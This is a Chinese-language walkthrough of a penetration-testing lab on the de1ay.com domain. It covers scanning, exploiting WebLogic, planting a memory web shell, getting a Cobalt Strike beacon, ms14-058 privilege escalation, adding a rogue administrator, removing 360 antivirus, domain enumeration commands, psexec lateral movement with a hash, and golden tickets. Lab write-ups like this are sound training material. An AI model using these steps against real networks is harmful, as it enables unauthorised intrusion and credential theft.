网络拓扑图

官方手册写的内网是10.10.10.x

PC

DC

WEB

只有DC不需要出网

注意WEB虚拟机需要回退到快照三才能正常运行

web

密码都是1qaz@WSX

登进去后输入administrator\1qaz@WSX

因为我没有改NAT网卡，所以WEB和PC都需要在虚拟机里调ip

因为我的网关设置的是22.2，都要改为一样的

在C:\Oracle\Middleware\user_projects\domains\base_domain以管理员运行startWebLogic

同样的，PC也是这样改

浏览器访问http://192.168.22.80/能访问就行了

外网侵入

端口扫描

 nmap -sS -sV -sC -p- -T4 -Pn <目标IP>

发现只有7001端口能访问

用fscan扫描一下

用weblogic漏洞工具就能打

看来又很多漏洞，随便挑一个

先关防火墙，（不过好像没关上，后面再关无所谓）

传内存马，用冰蝎连接

和上一个靶机一样，生成可执行文件，上传到主机，Cobalt Strike上线

登上去后发现可以用ms14-058提权到system

查看进程发现有个360杀软，直接删删不掉，想办法把360卸载了

思路是创造一个管理员用户，用RDP登录主机，再把360卸载

net user ikun 1qaz@WSX@ /add

net localgroup Administrators ikun /add

然后就能卸载了（实际上灭掉杀软应该在上线cs之前做，但是杀软没有拦截，就跳过了）

开始域渗透

net view # 查看局域网内其他主机名

net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域

net user # 查看本机用户列表

net user /domain # 查看域用户

net localgroup administrators # 查看本地管理员组（通常会有域用户）

net view /domain # 查看有几个域

net user 用户名 /domain # 获取指定域用户的信息

net group /domain # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）

net group 组名 /domain # 查看域中某工作组

net group “domain admins” /domain # 查看域管理员的名字

net group “domain computers” /domain # 查看域中的其他主机名

net group “domain controllers” /domain # 查看域控制器主机名（可能有多台）

用这些命令就行，我也懒得记了，直接用cs里的插件

只有一个域， de1ay.com

域控名字 DC.de1ay.com，IP是10.10.10.10

操作系统版本 Windows Server 2012 R2 Standard

查看域内用户

Administrator

Guest

de1ay

krbtgt

MSSQL

域SID

shell wmic useraccount where "name='Administrator' and domain='de1ay'" get domain,name,sid

去掉最后的-500就是域SID

S-1-5-21-2756371121-2868759905-3853650604

域内存活的主机

DC.de1ay.com

PC.de1ay.com

WEB.de1ay.com

域管理员

Administrator

域名，域SID，域控账号，域控ip，用户和管理员都知道了

扫描内网的端口

10-DC: 135，139，88，53，3389，445

201-PC: 135，139，3389，445

发现都有445端口，和上一个一样用psexec横向

建议选择域管理员用户，hash凭证，短域名，会话选SYSTEM这样不容易出错

横向移动pc的时候发现360会把木马杀了，那就再web主机上远程登录PC主机（听起来有点神经，给windows挂个内网代理也可以）

这样就成功上线了

生成黄金凭证

和上一个靶机一样，不详细说明了